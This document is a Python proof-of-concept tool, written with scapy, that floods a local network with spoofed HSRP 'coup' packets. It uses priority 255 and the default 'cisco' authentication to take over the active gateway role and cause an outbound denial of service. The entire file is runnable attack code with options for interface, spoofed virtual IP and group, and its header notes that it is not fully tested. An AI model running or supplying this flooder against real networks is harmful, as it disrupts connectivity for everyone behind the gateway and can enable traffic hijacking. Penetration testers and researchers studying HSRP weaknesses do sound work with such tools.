#!/usr/bin/python

#
# Proof-of-concept HSRP Active router Flooder triggering outbound gateway Denial of Service. Not fully tested, not working stabily at the moment.
#
# Python requirements:
#   - scapy
#
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
#

import sys
import struct
import string
import random
import argparse
import multiprocessing

import socket
import fcntl
import struct

try:
    from scapy.all import *
except ImportError:
    print('[!] Scapy required: pip install scapy')
    sys.exit(1)
 
VERSION = '0.1'

config = {
    'verbose' : False,
    'interface' : None,
    'processors' : 1,

    # HSRP Fields
    'group' : 1,
    'priority' : 255,
    'virtual-ip' : '',
    'source-ip' : '',
    'dest-ip' : '224.0.0.2',
    'auth' : 'cisco\x00\x00\x00',
}

stopThreads = False


#
# ===============================================
#

class Logger:
    @staticmethod
    def _out(x): 
        if config['verbose']: 
            sys.stdout.write(x + '\n')

    @staticmethod
    def out(x): 
        Logger._out('[.] ' + x)
    
    @staticmethod
    def info(x):
        Logger._out('[?] ' + x)
    
    @staticmethod
    def err(x): 
        sys.stdout.write('[!] ' + x + '\n')
    
    @staticmethod
    def fail(x):
        Logger._out('[-] ' + x)
    
    @staticmethod
    def ok(x):  
        Logger._out('[+] ' + x)

def generatePacket():
    ip = IP()
    ip.src = config['source-ip']
    ip.dst = config['dest-ip']

    udp = UDP()
    udp.sport = 1985
    udp.dport = 1985
    
    hsrp = HSRP()
    hsrp.version = 0
    hsrp.opcode = 1
    hsrp.group = config['group']
    hsrp.priority = config['priority']
    hsrp.virtualIP = config['virtual-ip']
    hsrp.auth = config['auth']

    hsrppacket = ip / udp / hsrp
    return hsrppacket

def flooder(num):
    Logger.info('Starting task: {}'.format(num))

    while stopThreads != True:
        try:
            p = generatePacket()
            if stopThreads: raise KeyboardInterrupt
            send(p, verbose = config['verbose'], iface = config['interface'])
        except KeyboardInterrupt:
            break

    Logger.info('Stopping task: {}'.format(num))

def get_ip_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(
        s.fileno(),
        0x8915,  # SIOCGIFADDR
        struct.pack('256s', ifname[:15])
    )[20:24])
 
def parseOptions(argv):
    global config

    print('''
        :: HSRP Flooding / Denial of Service tool
        Floods the interface with Active router Coup HSRP packets.
        Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
        v{}
'''.format(VERSION))

    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
    parser.add_argument('-I', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
    parser.add_argument('-s', '--source', metavar='SRC', default='', help='Specify source IP address. By default: own IP')
    parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')

    hsrp = parser.add_argument_group('HSRP Fields', 'Specifies contents of interesting HSRP fields in packets to send')
    hsrp.add_argument('-g', '--group', help = 'Group number. Default: 1')
    hsrp.add_argument('-p', '--priority', help = 'Active router priority. Default: 255')
    hsrp.add_argument('-i', '--virtual-ip', dest='virtualip', help = 'Virtual IP of the gateway to spoof.')
    hsrp.add_argument('-a', '--auth', help = 'Authentication string. Default: cisco')

    args = parser.parse_args()

    if not args.interface:
        print('[!] Interface option is mandatory.')
        sys.exit(-1)

    config['verbose'] = args.verbose
    config['interface'] = args.interface
    #config['processors'] = multiprocessing.cpu_count()

    if args.group: config['group'] = args.group
    if args.priority: config['priority'] = args.priority
    if args.virtualip: config['virtual-ip'] = args.virtualip
    if args.auth: config['auth'] = args.auth
    if args.source: config['source-ip'] = args.source
    else: config['source-ip'] = get_ip_address(config['interface'])

    print('Using source IP address: {}'.format(config['source-ip']))

    return args

def main(argv):
    global stopThreads

    opts = parseOptions(argv)
    if not opts:
        Logger.err('Options parsing failed.')
        return False

    if os.getuid() != 0:
        Logger.err('This program must be run as root.')
        return False

    jobs = []
    for i in range(config['processors']):
        task = multiprocessing.Process(target = flooder, args = (i,))
        jobs.append(task)
        task.daemon = True
        task.start()

    print('[+] Started flooding on dev: {}. Press CTRL-C to stop that.'.format(config['interface']))
    try:
        while jobs:
            jobs = [job for job in jobs if job.is_alive()]
    except KeyboardInterrupt:
        stopThreads = True
        print('\n[>] Stopping...')

    stopThreads = True
    time.sleep(3)

if __name__ == '__main__':
    main(sys.argv)